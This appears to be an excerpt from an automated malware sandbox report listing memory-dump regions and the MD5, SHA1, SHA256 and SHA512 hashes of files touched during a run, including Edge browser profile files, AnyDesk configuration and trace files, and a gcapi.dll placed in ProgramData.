memory/7072-722-0x0000000000AB0000-0x00000000021F9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | affc7bdc7d2372ec67d38457145ef0d0 |
| SHA1 | b09ac2d55e468d80b7b7f09f70482ab1f7922bb0 |
| SHA256 | db70948abe318adf3df5ee9c2eb1bad0d64fce808423422435a82ff9259e68bc |
| SHA512 | e1272ca45494e642e1918f09421b469f2eed4e7341b79d5f5f8246eb0123ab3ac31ba266fbde59e4833c5fd7215ecb391df382db490d3d0ce4795cdfe9db2e96 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024
| MD5 | 90785397d441dd458ec8037e6483808f |
| SHA1 | 4d2a2f973969e2bf5e2de57118a0a38e05d25555 |
| SHA256 | 499ec16c540115762fb2b34b1c1a334831bff56cd229ad20814a839be3f150ae |
| SHA512 | 968411eaf912cfd98864eacc58bb635ae0984b6f589caa4e721c5e9292f719b63c674aef6c89945a1accd2565ab684af6e76fde5aed2e0edfa44d016d879ce76 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000029
| MD5 | 87e8230a9ca3f0c5ccfa56f70276e2f2 |
| SHA1 | eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7 |
| SHA256 | e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9 |
| SHA512 | 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2e9d451abf03ed87031551878bdd72a3 |
| SHA1 | f3a6a71280aeff1e75b3276def294c85dd596adf |
| SHA256 | 50b89abb7065c1e6a8491ee70a1de01caaf47da877ce1f2b3e0e765f4e0a131b |
| SHA512 | c06f40c4c3d98544e22f0fa37147ecfc8a348b48a85dc405d22a2eabd3f3710c04eedb47296793e5a75a0b55be90aec15090dd2f3212037496ff993406d56189 |
memory/4660-867-0x00007FFB1DFE0000-0x00007FFB1DFF1000-memory.dmp
memory/4660-858-0x00007FF76FA00000-0x00007FF76FAF8000-memory.dmp
memory/5452-857-0x0000000000AB0000-0x00000000021F9000-memory.dmp
memory/4660-879-0x00007FFB1CBF0000-0x00007FFB1CC01000-memory.dmp
memory/4660-878-0x00007FFB1DCF0000-0x00007FFB1DD01000-memory.dmp
memory/4660-877-0x00007FFB1DD10000-0x00007FFB1DD21000-memory.dmp
memory/3940-880-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/4660-876-0x00007FFB1DD30000-0x00007FFB1DD48000-memory.dmp
memory/4660-868-0x0000026C5B510000-0x0000026C5C5C0000-memory.dmp
memory/4660-872-0x00007FFB1DD50000-0x00007FFB1DD71000-memory.dmp
memory/4660-871-0x00007FFB1DD80000-0x00007FFB1DDC1000-memory.dmp
memory/4660-870-0x00007FFB1DDD0000-0x00007FFB1DFDB000-memory.dmp
memory/5412-847-0x00000000000C0000-0x0000000001809000-memory.dmp
memory/4660-866-0x00007FFB1E000000-0x00007FFB1E01D000-memory.dmp
memory/4660-865-0x00007FFB1E020000-0x00007FFB1E031000-memory.dmp
memory/4660-864-0x00007FFB1E040000-0x00007FFB1E057000-memory.dmp
memory/4660-863-0x00007FFB1E060000-0x00007FFB1E071000-memory.dmp
memory/4660-862-0x00007FFB1E080000-0x00007FFB1E097000-memory.dmp
memory/4660-860-0x00007FFB1E0A0000-0x00007FFB1E356000-memory.dmp
memory/4660-861-0x00007FFB1F400000-0x00007FFB1F418000-memory.dmp
memory/4660-859-0x00007FFB1E360000-0x00007FFB1E394000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | eb8d4b02e81bdf48bc40d3bce73f9393 |
| SHA1 | 847499471afc2a50f76aa57df5f3607d746328e6 |
| SHA256 | e173d0967a2e44fc56919966dbfec0cda7eedac8b38379e0c7fc7be1be6b132d |
| SHA512 | 69f49841b0a18898ecd5c8a90b87baede7b7766df194e125776010668d36eccdbdd8b218079d7ddf34d87eb87c31e5d301e8ddbcc253755947106a2a38f5c751 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d943e18a8ac3d57b51502e50d8969980 |
| SHA1 | 2c3413b18ec0513f86db84338b87bb5d68951eda |
| SHA256 | 711ca394abef915e0c98d7ffa93dcece4ae43eb523ec8e266861ec93a58cbf5a |
| SHA512 | 90bc8840b1ba352245677f4cb3acb0a1b0cf7782a243cc7d699a67ec4430650f3f087d926499ab565f5a6ee36c9b4b3576eafab3c940c166c7d43e23b4754f2c |
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf
| MD5 | 8a3a1b1aa26b6284eb45d535b53f6516 |
| SHA1 | 08824730b257f422688232cf0df61f8a3ce0dc1f |
| SHA256 | 6ac864e51b394044d0203b6182c5a52f8c8f4bace36f5c13262b40a7bfe9ee15 |
| SHA512 | 4f7bff00c46f0014afc3499af643b007a1b73f40d0c29d9d76c412c54d2806216c60db240b2f5333c3f28936a4e90abf3052736a18e674f07fe5a9e6a2446466 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf
| MD5 | 28adc3ef4d1a5c1258cff586b0cf0e3f |
| SHA1 | 351835099cbf9f0c3b4c4bbc19a23fab75405735 |
| SHA256 | c0dc7d9ff691c42d15ad603939058257febf96f00921fa456fb67c859e3454ff |
| SHA512 | 7d321dfc0766f9a071b6cde5de681e5ce833315008f77a0cf747c9b08c8c7fbbdaa67ca1843d5452b05d126ce1e29f0f9dc8d159bfe049fc834c66436b85d1b7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8d2d9529e6056e93e252ea5cefd5b95c |
| SHA1 | 5a3167737dedc38661d35cd14967c0d6a835d73e |
| SHA256 | 32b663897d5ce5e9064301847fecdd1fdf41b6fd2ec4add9d06c74c6e7b7f213 |
| SHA512 | 1fefad1ae3968b25b4855a194ad78f44ceb6b60217901d94c25ccea31253880e3f2e6170e1b1cc61256cc1665003a6983105bf9e40e48a86e8c7c8e088468d11 |
C:\ProgramData\gcapi.dll
| MD5 | 1ce7d5a1566c8c449d0f6772a8c27900 |
| SHA1 | 60854185f6338e1bfc7497fd41aa44c5c00d8f85 |
| SHA256 | 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf |
| SHA512 | 7e3411be8614170ae91db1626c452997dc6db663d79130872a124af982ee1d457cefba00abd7f5269adce3052403be31238aecc3934c7379d224cb792d519753 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7e96449902f0833e4c349260da780b91 |
| SHA1 | 561cfdce8ae2d13f0de9157eb4f2b37e3077e4bc |
| SHA256 | ae28df2d1d4456f6a5127a42cdff8d6b0d436bfea67574e382b9e90b50a66d11 |
| SHA512 | c3057ce95cb5d539445b5d17ef54f759317ab7666452229ce6506930ede43adee202f693f8328b18af4d962b73d3ab422bad9ebf0336a91c0780af0be576411b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 6e8dc578d33e4e5755dbf990787eb85d |
| SHA1 | cb9fdedcb5adf2dd42dbd10e8faad6d184697d04 |
| SHA256 | 3e167f04413028cf244a18f161ee1cca3fd453370f4c660ff62954ab7a135d89 |
| SHA512 | 89bcef2fe78bddccc3eaac677a91e6df191ad4d68634ef1a76eea29bf1b845667754f75b2b7c6496c925b3042b9322b9896d2c3694cffe5edeb1225d5f663c2b |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 3dd79df58d257ccb173429ba38efe23d |
| SHA1 | 2cec6dbb0a0501e31ba2d0ed2d1d35f87a0eca00 |
| SHA256 | 2363422dd749d4974882ca8b883e6d1b5989af278e572897edd180407dda9fa8 |
| SHA512 | 88db00289c405cc4c5eff19e068b93b331e648820ed6593ef634c1c3d2967b103859150a0961e8e50a6e2179b7c210e7d0a4672f7fc22033f53a7207752e11c5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f656418acad6993796928d0d261195f1 |
| SHA1 | 20026ffd5e169caa48160ba31cf3b68267975f0e |
| SHA256 | f510d474c2e4718bdd3979066a6a032947dfcd71c330f2ed1b848dbbb0b69c2b |
| SHA512 | 468e40ad8031bbffc982121059fb71e9cef75d925587b7e28e434bd08bfa6dd4729b48d60c122f7cbde85c296743cee497d523c68f25336a0f38487828938e94 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c75706c9386643fbb7b40f2cc0e7367d |
| SHA1 | 7215fb0957d1dfe3d51b40079faa92383bbbf39c |
| SHA256 | 6c32f821cb9b16b8462f100b94d3b973c7927e8d61237ae75fbc25ca948d69b9 |
| SHA512 | 79c07a8d0fcbebdb3f080ad6c1bce3b40b3dbace2c52f5983afc680431cec58ec16be0faedaf2ee4c95ccb69c394eb1508782075728b92f5df9d0850053e2a80 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | c49abdbf8a6c583e2d6b8a4ac476497d |
| SHA1 | 149c84b34c04dbfe9259a41f3605dc42e07554b7 |
| SHA256 | 461b1b044723739f8c0543dcbd98f51887caf47e2cb7a04fc97797b944492b74 |
| SHA512 | 75ba1ccd47dcf066182ff8057a959bb5a8a1db220d344f9f5ac1226187dc43f7ec80d4a39d0d26568265257f6e073e9c3922d463ebafa8072aa0e574265de5e8 |